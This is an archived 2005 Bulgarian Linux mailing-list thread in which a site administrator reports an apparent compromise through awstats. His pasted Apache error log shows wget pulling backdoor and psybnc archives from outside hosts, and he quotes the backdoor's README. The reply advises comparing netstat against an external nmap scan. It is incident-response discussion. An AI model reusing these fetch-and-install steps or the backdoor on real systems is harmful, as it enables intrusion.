Linux-Bulgaria.ORG
навигация

 

начало

пощенски списък

архив на групата

семинари ...

документи

как да ...

 

 

Предишно писмо Следващо писмо Предишно по тема Следващо по тема По Дата По тема (thread)

Re: lug-bg: нещо интересно


  • Subject: Re: lug-bg: нещо интересно
  • From: Georgi Genov <ggenov@xxxxxxxxxxx>
  • Date: Wed, 23 Feb 2005 02:26:18 +0200

D. Dilev wrote:

Здравейте :)

хоствам няколко сайта и ползвам awstats от 2г. като трафик анализатор за моя лична информция.

Днес в 22:04 стартирах awstats за пореден път за да анализира логовете на апача. Съвсем случайно по това време бях пуснал следната команда:
#tail -f /var/log/apache/*

и наблюдавах активността на сайтовете... Малко след като стартирах awstats се появи следното в error.log файла:

==== cut ====

sh: line 1: /awstats.mydomain.com.conf: No such file or directory
--22:04:48--  http://www.petry.se/public_html/tw.tar.gz
          => `tw.tar.gz'
Resolving www.petry.se... done.
Connecting to www.petry.se[195.47.247.72]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,414 [application/x-tar]

   0K .......... ......                                     100%  141.85 KB/s

22:04:48 (141.85 KB/s) - `tw.tar.gz' saved [16414/16414]

--22:04:51--  http://www.petry.se/public_html/tw.tar.gz
          => `tw.tar.gz'
Resolving www.petry.se... done.
Connecting to www.petry.se[195.47.247.72]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,414 [application/x-tar]

   0K .......... ......                                     100%  130.32 KB/s

22:04:52 (130.32 KB/s) - `tw.tar.gz' saved [16414/16414]

sh: line 1: cd: rw: No such file or directory
sh: line 1: ./bind: No such file or directory
sh: line 1: fg: no job control
--22:06:03--  http://geocities.com/sickady/p.tgz
          => `p.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605,272 [application/x-compressed]

   0K .......... .......... .......... .......... ..........  8%   81.83 KB/s
  50K .......... .......... .......... .......... .......... 16%  235.85 KB/s
 100K .......... .......... .......... .......... .......... 25%  253.81 KB/s
 150K .......... .......... .......... .......... .......... 33%  242.72 KB/s
 200K .......... .......... .......... .......... .......... 42%  248.76 KB/s
 250K .......... .......... .......... .......... .......... 50%  250.00 KB/s
 300K .......... .......... .......... .......... .......... 59%    2.33 MB/s
 350K .......... .......... .......... .......... .......... 67%  240.38 KB/s
 400K .......... .......... .......... .......... .......... 76%  252.53 KB/s
 450K .......... .......... .......... .......... .......... 84%  255.10 KB/s
 500K .......... .......... .......... .......... .......... 93%  253.81 KB/s
 550K .......... .......... .......... .......... .         100%   25.04 KB/s

22:06:08 (144.59 KB/s) - `p.tgz' saved [605272/605272]


tools/convconf.c: In function `cofile':
tools/convconf.c:81: warning: deprecated use of label at end of compound statement
gcc: installation problem, cannot exec `as': No such file or directory
make: *** [all] Error 1
./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control
--22:09:15--  http://geocities.com/sickady/p.tgz
          => `p.tgz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605,272 [application/x-compressed]

   0K .......... .......... .......... .......... ..........  8%   78.49 KB/s
  50K .......... .......... .......... .......... .......... 16%  231.48 KB/s
 100K .......... .......... .......... .......... .......... 25%  236.97 KB/s
 150K .......... .......... .......... .......... .......... 33%  239.23 KB/s
 200K .......... .......... .......... .......... .......... 42%  238.10 KB/s
 250K .......... .......... .......... .......... .......... 50%  240.38 KB/s
 300K .......... .......... .......... .......... .......... 59%    2.12 MB/s
 350K .......... .......... .......... .......... .......... 67%  233.64 KB/s
 400K .......... .......... .......... .......... .......... 76%  238.10 KB/s
 450K .......... .......... .......... .......... .......... 84%  252.53 KB/s
 500K .......... .......... .......... .......... .......... 93%  255.10 KB/s
 550K .......... .......... .......... .......... .         100%    1.11 MB/s

22:09:18 (230.17 KB/s) - `p.tgz' saved [605272/605272]

./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control

==== /cut ====

Сами виждате - нещо изтегли и се опита да инсталира следните пакети при това по 2 пъти:
1. http://www.petry.se/public_html/tw.tar.gz
2. http://geocities.com/sickady/p.tgz

Аз смятам че има връзка с awstats защотото, освен че се появи малко след стартиране на австатс (няколко секунди), забележете ред 1 от това което Ви пейстнах: sh: line 1: /awstats.mydomain.com.conf: No such file or directory

Какво е това? Задна врата в австатс? или уязвимост в австатс?
аз изтеглих въпросните 2 пакета и в README файла на tw.tar.gz пише следното:

59768 port backdoor
no password needed , easy to install and hiding from ps and ps ax:D
have phun !
wget at home.ro

Другия пакет се оказа че е psybnc. Незнам за какво служи. То и от последния ред който пейстнах там по-горе се вижда това:

./psybnc: error while loading shared libraries: libssl.so.0.9.6: cannot open shared object file: No such file or directory
sh: line 1: fg: no job control

Всичко това стана пред очите ми.
изпълних updatedb
locate psybnc
locate p.tgz
locate tw.tar.gz
locate tools/convconf.c
locate convconf.c

и никоя от тях не намери нищо.
в логовете открих точно по същото време изпратени 2 мейла:

from <anonymous@xxxxxxxxxxxx> to remote textercrew@xxxxxxxxx
from <anonymous@xxxxxxxxxxxx> to remote TwiNkieonline@xxxxxxxxx

Търсих, рових.... не намерих нищо друго подозрително!

Сървъра е apache 1.3.33

Вие какво мислите? как да процедирам?

Благодаря за помощта!
По принцип psybnc е irc proxy, но едвали при теб работи точно так. Понеже самото psybnc е само един binary файл лесно може да бъде подправен. И на практика да е например telnet демон със сигурност няма да го видиш стартиран никъде със сигурност няма и да го намериш а и да го намериш и изтриеш след рестарт ще го има пак. И със сигурност вече са те root-нали. Как можеш да рабереш дали има нещо такова. Пусни един един netstat и виж какви портове имаш отворени спри си firewall-а и от друга машина си сканирай портовете с nmap на тази хакнатата машина. Ако резултата от netstat и nmap показва ралики, например даден порт го няма в netstat а го има в nmap ... честито ... може да се пробваш да се телнетнеш на този порт може и да не ти иска парола направо root ....

--
Georgi Genov
ggenov@xxxxxxxxxxx

============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================



 

наши приятели

 

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

 

 

Linux-Bulgaria.ORG

Mailing list messages are © Copyright their authors.